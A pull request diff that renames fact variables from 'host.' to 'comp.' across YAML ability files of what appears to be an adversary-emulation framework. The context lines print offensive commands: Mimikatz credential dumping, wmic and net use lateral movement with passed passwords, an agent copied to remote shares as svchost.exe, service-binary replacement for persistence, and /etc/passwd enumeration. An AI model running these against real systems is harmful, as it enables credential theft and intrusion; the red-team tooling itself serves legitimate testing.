### PR TITLE
Private fact audit

### DIFF
--- a/data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml
+++ b/data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml
@@ -11,4 +11,4 @@
     darwin:
       sh:
         command: |
-          find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o "\b[A-Za-z0-9._%+-]+@#{target.org.name}\b" 2>/dev/null {} \;
+          find $(echo ~#{comp.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o "\b[A-Za-z0-9._%+-]+@#{target.org.name}\b" 2>/dev/null {} \;

--- a/data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml
+++ b/data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml
@@ -11,4 +11,4 @@
     darwin:
       sh:
         command: |
-          find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o "(($(echo #{host.broadcast.ip} | cut -d. -f-2))\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" 2>/dev/null {} \;
+          find $(echo ~#{comp.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o "(($(echo #{comp.broadcast.ip} | cut -d. -f-2))\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" 2>/dev/null {} \;

--- a/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
+++ b/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml
@@ -17,6 +17,6 @@
           iex $result; Invoke-Mimikatz -DumpCreds
         parsers:
           plugins.stockpile.app.parsers.katz:
-            - source: host.user.name
+            - source: comp.user.name
               edge: has_password
-              target: host.user.password
+              target: comp.user.password

--- a/data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml
+++ b/data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml
@@ -16,5 +16,5 @@
         payload: PowerView.ps1
         parser:
           name: regex
-          property: host.host.fqdn
+          property: comp.host.fqdn
           script: '[\S]+'

--- a/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml
+++ b/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml
@@ -11,8 +11,8 @@
     darwin:
       sh:
         command: |
-          find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
+          find / -type d -user #{comp.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
     linux:
       sh:
         command: |
-          find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
+          find / -type d -user #{comp.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;

--- a/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
+++ b/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
@@ -11,11 +11,11 @@
     darwin:
       sh:
         command: |
-          ps aux | grep #{host.user.name}
+          ps aux | grep #{comp.user.name}
     linux:
       sh:
         command: |
-          ps aux | grep #{host.user.name}
+          ps aux | grep #{comp.user.name}
     windows:
       psh:
         command: |
@@ -23,7 +23,7 @@
           gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
           $ps = get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
           foreach($p in $ps) {
-              if($p.Owner -eq "#{host.user.name}") {
+              if($p.Owner -eq "#{comp.user.name}") {
                   $p
               }
           }

--- a/data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml
+++ b/data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml
@@ -16,5 +16,5 @@
         payload: PowerView.ps1
         parser:
           name: json
-          property: host.user.name
+          property: comp.user.name
           script: samaccountname

--- a/data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml
+++ b/data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml
@@ -11,5 +11,5 @@
     darwin:
       sh:
         command: |
-          for ip in $(seq 190 199); do ping -c 1 $(echo #{host.broadcast.ip} |
+          for ip in $(seq 190 199); do ping -c 1 $(echo #{comp.broadcast.ip} |
           cut -d. -f-3).$ip -W 1; done

--- a/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
+++ b/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
@@ -14,5 +14,5 @@
           ifconfig | grep broadcast
         parser:
           name: regex
-          property: host.broadcast.ip
+          property: comp.broadcast.ip
           script: '(?<=broadcast ).*'

--- a/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml
+++ b/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml
@@ -13,14 +13,14 @@
         command: whoami
         parser:
           name: line
-          property: host.user.name
+          property: comp.user.name
           script: ''
     linux:
       sh:
         command: whoami
         parser:
           name: line
-          property: host.user.name
+          property: comp.user.name
           script: ''
     windows:
       psh,cmd:

--- a/data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml
+++ b/data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml
@@ -12,8 +12,8 @@
       psh:
         command: |
           $job = Start-Job -ScriptBlock {
-            $username = '#{host.user.name}';
-            $password = '#{host.user.password}';
+            $username = '#{comp.user.name}';
+            $password = '#{comp.user.password}';
             $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
             $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
             Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;

--- a/data/abilities/lateral-movement/2a32e46f-5346-45d3-9475-52b857c05342.yml
+++ b/data/abilities/lateral-movement/2a32e46f-5346-45d3-9475-52b857c05342.yml
@@ -11,12 +11,12 @@
     windows:
       psh:
         command: |
-          wmic /node:#{remote.host.ip} /user:#{host.user.name} /password:#{host.user.password} process call create "powershell.exe C:\Users\Public\svchost.exe -server #{server} -executors psh";
+          wmic /node:#{remote.host.ip} /user:#{comp.user.name} /password:#{comp.user.password} process call create "powershell.exe C:\Users\Public\svchost.exe -server #{server} -executors psh";
       cmd:
         command: |
-          wmic /node:#{remote.host.ip} /user:#{host.user.name} /password:#{host.user.password} process call create "cmd.exe /c C:\Users\Public\svchost.exe -server #{server} -executors cmd";
+          wmic /node:#{remote.host.ip} /user:#{comp.user.name} /password:#{comp.user.password} process call create "cmd.exe /c C:\Users\Public\svchost.exe -server #{server} -executors cmd";
   requirements:
     plugins.stockpile.app.requirements.basic:
-      - source: host.user.name
+      - source: comp.user.name
         edge: has_password
-        target: host.user.password
+        target: comp.user.password

--- a/data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml
+++ b/data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml
@@ -11,4 +11,4 @@
     windows:
       psh:
         command: |
-           net use \\#{remote.host.ip}\c$ /user:#{host.user.name} #{host.user.password};
+           net use \\#{remote.host.ip}\c$ /user:#{comp.user.name} #{comp.user.password};

--- a/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml
+++ b/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml
@@ -12,8 +12,8 @@
     windows:
       psh:
         command: |
-          $username = "#{host.user.name}";
-          $password = "#{host.user.password}";
+          $username = "#{comp.user.name}";
+          $password = "#{comp.user.password}";
           $secstr = New-Object -TypeName System.Security.SecureString;
           $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
           $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;

--- a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
+++ b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
@@ -12,8 +12,8 @@
       psh,pwsh:
         command: |
           $job = Start-Job -ScriptBlock {
-            $username = "#{host.user.name}";
-            $password = "#{host.user.password}";
+            $username = "#{comp.user.name}";
+            $password = "#{comp.user.password}";
             $secstr = New-Object -TypeName System.Security.SecureString;
             $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
             $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;

--- a/data/abilities/lateral-movement/c5e75d70-09ae-469f-8717-621a1b7ef946.yml
+++ b/data/abilities/lateral-movement/c5e75d70-09ae-469f-8717-621a1b7ef946.yml
@@ -11,8 +11,8 @@
     windows:
       psh:
         command: |
-          $username = "#{host.user.name}";
-          $password = "#{host.user.password}";
+          $username = "#{comp.user.name}";
+          $password = "#{comp.user.password}";
           $secstr = New-Object -TypeName System.Security.SecureString;
           $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
           $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
@@ -27,7 +27,7 @@
           Remove-PSDrive -Name $drive;
       cmd:
         command: |
-          net use \\#{remote.host.ip}\c$ /user:#{host.user.name} #{host.user.password} /persistent:no &
+          net use \\#{remote.host.ip}\c$ /user:#{comp.user.name} #{comp.user.password} /persistent:no &
           copy /B /Y sandcat.go-windows \\#{remote.host.ip}\c$\Users\Pubic\svchost.exe
         payload: sandcat.go-windows
         cleanup: |

--- a/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml
+++ b/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml
@@ -5,7 +5,7 @@
   description: |
     This is an example technique. snmptrap.exe should be changed in the command
     below with the new desired service binary. Depending on the value of
-    host.service.modifiable this ability can damage the target system.
+    comp.service.modifiable this ability can damage the target system.
   tactic: persistence
   technique:
     attack_id: T1031
@@ -14,14 +14,14 @@
     windows:
       psh:
         command: |
-          $s = Get-Service -Name #{host.service.modifiable};
+          $s = Get-Service -Name #{comp.service.modifiable};
           if ($s.status -ne 'Stopped') { Stop-Service $s };
-          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{host.service.modifiable}").ImagePath.split()[0];
+          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{comp.service.modifiable}").ImagePath.split()[0];
           $path = (Resolve-Path $exe).Path;
           Copy-Item -Path $path -Destination ($path + ".saved");
           Copy-Item -Path "C:\Windows\System32\snmptrap.exe" -Destination $path
         cleanup: |
-          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{host.service.modifiable}").ImagePath.split()[0];
+          $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{comp.service.modifiable}").ImagePath.split()[0];
           $path = (Resolve-Path $exe).Path;
           If (Test-Path ($path + ".saved")) {
             Remove-Item $path;

--- a/data/abilities/persistence/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
+++ b/data/abilities/persistence/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
@@ -14,11 +14,11 @@
           cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
         parsers:
           plugins.stockpile.app.parsers.basic:
-            - source: host.user.name
+            - source: comp.user.name
     linux:
       sh:
         command: |
           cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
         parsers:
           plugins.stockpile.app.parsers.basic:
-            - source: host.user.name
+            - source: comp.user.name

--- a/data/facts/ed32b9c3-9593-4c33-b0db-e2007315096b.yml
+++ b/data/facts/ed32b9c3-9593-4c33-b0db-e2007315096b.yml
@@ -7,7 +7,7 @@ facts:
     value: txt
   - property: file.sensitive.extension
     value: yml
-  - property: host.service.modifiable
+  - property: comp.service.modifiable
     value: fax
   - property: target.org.name
     value: mitre.org


### PR DESCRIPTION
The private facts that were changed to public are: host.broadcast.ip, host.host.fqdn, host.user.name, host.user.password, and host.service.modifiable. These were made public by changing the first 'host' to 'comp'. The private facts that remain private are: host.dir.staged, host.dir.compress, host.file.sensitive, and host.system.path.